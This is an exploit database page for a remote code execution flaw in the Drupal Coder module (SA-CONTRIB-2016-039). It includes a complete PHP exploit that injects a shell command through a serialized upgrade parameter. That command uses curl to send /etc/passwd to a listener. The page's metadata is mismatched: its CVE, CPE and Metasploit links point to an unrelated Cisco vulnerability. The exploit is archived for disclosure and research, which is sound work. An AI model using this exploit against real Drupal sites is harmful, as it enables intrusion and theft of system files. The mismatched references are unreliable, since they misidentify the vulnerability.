Drupal module Coder Remote Code Execution (SA-CONTRIB-2016-039)

vendor:

Coder

by:

Raz0r

7,5

CVSS

HIGH

Remote Code Execution

CWE

Product Name: Coder

Affected Version From: 7.12

Affected Version To: 7.12

Patch Exists: YES

Related CWE: CVE-2016-6385

CPE: a:drupal:drupal:7.12

Metasploit: https://www.rapid7.com/db/vulnerabilities/cisco-xe-cve-2016-6385/, https://www.rapid7.com/db/vulnerabilities/cisco-sa-20160928-smi/

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2016

Drupal module Coder Remote Code Execution (SA-CONTRIB-2016-039)

This exploit allows an attacker to execute arbitrary code on a vulnerable Drupal installation. The vulnerability exists in the Coder module, which is used to review and audit code. The vulnerability is due to the lack of input validation when handling certain parameters. An attacker can craft a malicious payload and send it to the vulnerable server, which will then execute the code.

Mitigation:

Upgrade to the latest version of the Coder module.

Source

Exploit-DB raw data:

<?php

# Drupal module Coder Remote Code Execution (SA-CONTRIB-2016-039)
# https://www.drupal.org/node/2765575
# by Raz0r (http://raz0r.name)
#
# E-DB Note: Source ~ https://gist.github.com/Raz0r/7b7501cb53db70e7d60819f8eb9fcef5

$cmd = "curl -XPOST http://localhost:4444 -d @/etc/passwd";
$host = "http://localhost:81/drupal-7.12/";

$a = array(
    "upgrades" => array(
        "coder_upgrade" => array(
            "module" => "color",
            "files" => array("color.module")
        )
    ),
    "extensions" => array("module"),
    "items" => array (array("old_dir"=>"test; $cmd;", "new_dir"=>"test")),
    "paths" => array(
        "modules_base" => "../../../",
        "files_base" => "../../../../sites/default/files"
    )
);
$payload = serialize($a);
file_get_contents($host . "/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php?file=data://text/plain;base64," . base64_encode($payload));

?>